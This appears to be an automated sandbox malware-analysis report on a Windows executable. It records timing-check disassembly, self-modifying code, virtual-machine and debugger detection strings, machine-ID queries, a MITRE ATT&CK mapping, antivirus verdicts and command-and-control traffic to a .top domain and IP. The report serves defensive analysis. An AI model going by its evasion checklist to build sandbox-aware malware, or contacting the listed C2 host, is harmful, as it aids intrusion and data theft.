Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431287 second address: 7431343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c jmp 00007FAD4CB4B580h 0x00000011 mov dword ptr [edx+20h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FAD4CB4B57Eh 0x0000001b and eax, 65998D18h 0x00000021 jmp 00007FAD4CB4B57Bh 0x00000026 popfd 0x00000027 push eax 0x00000028 pushad 0x00000029 popad 0x0000002a pop edi 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+24h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FAD4CB4B57Eh 0x00000036 adc ah, 00000078h 0x00000039 jmp 00007FAD4CB4B57Bh 0x0000003e popfd 0x0000003f mov ax, EEAFh 0x00000043 popad 0x00000044 mov dword ptr [edx+24h], eax 0x00000047 jmp 00007FAD4CB4B582h 0x0000004c mov eax, dword ptr [esi+28h] 0x0000004f pushad 0x00000050 movzx eax, bx 0x00000053 mov ebx, 552F53EEh 0x00000058 popad 0x00000059 mov dword ptr [edx+28h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FAD4CB4B587h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431343 second address: 7431347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431347 second address: 743134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743134D second address: 74313A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB7BFFEh 0x00000013 add eax, 457795C8h 0x00000019 jmp 00007FAD4CB7BFFBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+2Ch], ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FAD4CB7C001h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74313A1 second address: 74313F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB4B587h 0x00000009 adc al, 0000006Eh 0x0000000c jmp 00007FAD4CB4B589h 0x00000011 popfd 0x00000012 mov si, 32F7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d jmp 00007FAD4CB4B57Ah 0x00000022 mov word ptr [edx+30h], ax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov bx, cx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74313F8 second address: 74313FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74313FC second address: 7431436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FAD4CB4B586h 0x0000000c sbb eax, 7EE3BF48h 0x00000012 jmp 00007FAD4CB4B57Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ax, word ptr [esi+32h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431436 second address: 743143C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743143C second address: 743149A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAD4CB4B588h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FAD4CB4B57Bh 0x0000000f add eax, 2EACFEEEh 0x00000015 jmp 00007FAD4CB4B589h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov word ptr [edx+32h], ax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FAD4CB4B57Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743149A second address: 74314C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB7BFFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74314C1 second address: 74314D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B57Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74314D1 second address: 7431521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+34h], eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB7BFFBh 0x00000016 add ecx, 1A367FBEh 0x0000001c jmp 00007FAD4CB7C009h 0x00000021 popfd 0x00000022 pop eax 0x00000023 popad 0x00000024 test ecx, 00000700h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431521 second address: 7431530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431530 second address: 74315C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FADBC90A1D4h 0x0000000f jmp 00007FAD4CB7BFFDh 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 pushad 0x00000019 mov ebx, eax 0x0000001b jmp 00007FAD4CB7C008h 0x00000020 popad 0x00000021 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000025 jmp 00007FAD4CB7C000h 0x0000002a or dword ptr [edx+40h], FFFFFFFFh 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop edx 0x00000031 pushfd 0x00000032 jmp 00007FAD4CB7C006h 0x00000037 jmp 00007FAD4CB7C005h 0x0000003c popfd 0x0000003d popad 0x0000003e pop esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FAD4CB7BFFDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74315C5 second address: 7431620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB4B587h 0x00000009 sub ax, F4AEh 0x0000000e jmp 00007FAD4CB4B589h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FAD4CB4B583h 0x00000020 leave 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431620 second address: 743163B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C007h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7480C0C second address: 7480C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB4B580h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7480C2A second address: 7480C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB7BFFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 742076D second address: 7420773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420773 second address: 7420777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C005F second address: 73C0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C0063 second address: 73C007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C007h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C007E second address: 73C0103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007FAD4CB4B57Bh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FAD4CB4B584h 0x00000017 jmp 00007FAD4CB4B585h 0x0000001c popfd 0x0000001d jmp 00007FAD4CB4B580h 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FAD4CB4B580h 0x00000029 mov ebp, esp 0x0000002b jmp 00007FAD4CB4B580h 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FAD4CB4B57Ah 0x0000003a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C0103 second address: 73C0109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C069B second address: 73C069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C09CE second address: 73C0A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FAD4CB7BFFAh 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 pushfd 0x00000014 jmp 00007FAD4CB7C003h 0x00000019 or si, 93DEh 0x0000001e jmp 00007FAD4CB7C009h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FAD4CB7BFFDh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C0A2B second address: 73C0A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0037 second address: 73F008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAD4CB7BFFEh 0x0000000f push eax 0x00000010 jmp 00007FAD4CB7BFFBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FAD4CB7C006h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FAD4CB7BFFAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F008A second address: 73F0099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0099 second address: 73F009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F009E second address: 73F00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF0h 0x0000000d jmp 00007FAD4CB4B587h 0x00000012 sub esp, 44h 0x00000015 pushad 0x00000016 mov si, FFABh 0x0000001a movzx ecx, di 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F00D5 second address: 73F00D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F00D9 second address: 73F00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F00DF second address: 73F010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB7C007h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F010B second address: 73F0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B57Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB4B580h 0x00000013 jmp 00007FAD4CB4B585h 0x00000018 popfd 0x00000019 mov edx, ecx 0x0000001b popad 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007FAD4CB4B57Ah 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0163 second address: 73F0167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0167 second address: 73F016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F016B second address: 73F0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0171 second address: 73F0224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FAD4CB4B583h 0x00000011 xor si, 612Eh 0x00000016 jmp 00007FAD4CB4B589h 0x0000001b popfd 0x0000001c popad 0x0000001d mov edi, dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 mov ax, D853h 0x00000025 pushfd 0x00000026 jmp 00007FAD4CB4B588h 0x0000002b jmp 00007FAD4CB4B585h 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp+24h], 00000000h 0x0000003a jmp 00007FAD4CB4B57Eh 0x0000003f lock bts dword ptr [edi], 00000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FAD4CB4B587h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0224 second address: 73F022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F022B second address: 73F023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FADBCE8D777h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F023E second address: 73F0242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0242 second address: 73F0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0248 second address: 73F024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Special instruction interceptor: First address: DA1C65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Special instruction interceptor: First address: F41B0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Special instruction interceptor: First address: F4188B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Special instruction interceptor: First address: FCBF48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_008A9980 rdtsc 0_2_008A9980
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_006C255D
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006C29FF
Source: xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: xdeRtWCeNH.exe, 00000000.00000003.1480088083.0000000001A41000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: xdeRtWCeNH.exe | Binary or memory string: Hyper-V RAW
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: xdeRtWCeNH.exe, 00000000.00000003.1482960332.0000000006C91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: xdeRtWCeNH.exe, 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: xdeRtWCeNH.exe, 00000000.00000003.1569152203.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1566635388.0000000001AA6000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000002.1591781406.0000000001AAF000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1569178095.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File opened: NTICE
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File opened: SICE
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_008A9980 rdtsc 0_2_008A9980
Source: xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: B6Program Manager
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.7:49704 -> 81.29.149.125:80
Source: global traffic | TCP traffic: 192.168.2.7:49705 -> 81.29.149.125:80
MITRE ATT&CK matrix (one line per tactic; the number in parentheses is the count of matching signatures, techniques without a number were not observed):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
xdeRtWCeNH.exe | 47% | Virustotal |
xdeRtWCeNH.exe | 100% | Avira | TR/Crypt.TPM.Gen
xdeRtWCeNH.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 81.29.149.125 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
